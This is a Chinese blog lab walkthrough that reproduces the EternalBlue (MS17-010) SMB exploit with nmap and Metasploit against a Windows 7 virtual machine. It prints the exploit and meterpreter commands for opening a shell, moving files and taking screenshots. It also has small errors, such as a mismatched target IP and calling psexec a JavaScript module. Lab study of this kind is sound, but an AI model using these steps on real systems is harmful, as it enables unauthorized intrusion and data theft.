复现永恒之蓝


一、永恒之蓝是什么?

永恒之蓝(Eternal Blue)爆发于2017年4月14日晚,是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机。

二、SMB协议

SMB(Server Message Block)是一个协议服务器信息块,它是一种客户机/服务器、请求/响应协议,通过SMB协议可以在计算机间共享文件、打印机、命名管道等资源;SMB协议工作在应用层和会话层,可以用在TCP/IP协议之上,SMB使用TCP139端口和TCP445端口。

三、复现环境

以下均在虚拟机中运行
受害机:windows7 x64 192.168.150.130
攻击机:kali linux 192.168.150.129
条件:两台主机之间要能ping的通(在同一网段)

四、复现步骤

以下行为虽为复现,但前期还是做一下收集信息的工作

1、主机发现

首先我们关闭win7的防火墙,不关闭防火墙后续操作可能存在问题(有可能nmap扫描不到其端口,MSF利用不了永恒之蓝漏洞)
在这里插入图片描述win7的地址
在这里插入图片描述kali的地址
在这里插入图片描述主机发现有许多方法,这里我们说两种方法
(1)用kali中的nmap 扫描网段做主机发现

nmap -sP 192.168.150.130

在这里插入图片描述(2)用kali中的metasploit(MSF)做主机发现

msfconsole                                 //启动MSF
use auxiliary/scanner/discovery/arp_sweep  //use使用模块
set rhosts 192.168.150.0/24   //设置扫描网段
set threads 50             //提高线程
run                        //运行

在这里插入图片描述

2、端口扫描

为了发现目的ip是否开放135、139、445端口,有两种方法
(1)使用namp -sT 端口扫描

nmap -sV 192.168.150.130

在这里插入图片描述(2)使用MSF 端口扫描

use auxiliary/scanner/portscan/tcp   //使用模块
set rhosts 192.168.150.130  //设置远程ip
run

在这里插入图片描述

扫出来端口139 135 445 是开放的,如果没有开启防火墙的状况下是可以直接利用的

3、利用模块

3.1 MSF 搜索永恒之蓝的漏洞 输入search ms17-010
在这里插入图片描述

1.  blue就是永恒之蓝的漏洞
2. psexec是可利用的一个javascripe(JS)的一个模块
3.  command是运行cmd的
4. 最后一个是探测的模块

我们先利用探测的模块看是否存在漏洞

use 3  //使用模块 use auxiliary/scanner/smb/smb_ms17_010也可以
show options   //查看要配置的参数
set rhosts 192.168.95.129   //设置远程ip
run                    //运行

在这里插入图片描述
扫出来 红框里的那句话,说明极大可能存在永恒之蓝漏洞

3.2 利用永恒之蓝模块

use exploit/windows/smb/ms17_010_eternalblue
show options  //查看要配置的参数
set rhosts 192.168.150.130
exploit/run

在这里插入图片描述在这里插入图片描述

出现meterpreter即成功,MeterpreterMetasploit 的一个扩展模块,可以调用 Metasploit 的一些功能,
对目标系统进行更深入的渗透,如进入cmd、获取屏幕、上传/下载文件、创建持久后门等

在这里插入图片描述

五、演示功能

1、获取cmd

meterpreter > shell
chcp 65001  //转换一下编码 要不然会乱码
ipconfig  #查看ip
whoami    #查看当前用户名称

在这里插入图片描述

2、上传文件

这里将kali的index.html文件上传到win7的c盘中

C:\Windows\system32>exit
exit
meterpreter > upload /home/kkk/Desktop/index.html c://
[*] Uploading  : /home/kkk/Desktop/index.html -> c://\index.html
[*] Completed  : /home/kkk/Desktop/index.html -> c://\index.html

在这里插入图片描述
在这里插入图片描述
可以看到上传成功

3、下载文件

这里我们将win7 c盘里的test文件下载到kali里
在这里插入图片描述

meterpreter > download c://test.txt

在这里插入图片描述

4、捕获屏幕

meterpreter > screenshot   #屏幕截图

在这里插入图片描述
在这里插入图片描述后续还可以上传后门、提权、权限维持等操作,持久化控制主机,这里就不说了。

参考文章:Kali–MSF-永恒之蓝详解(复现、演示、远程、后门、加壳、修复)

评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值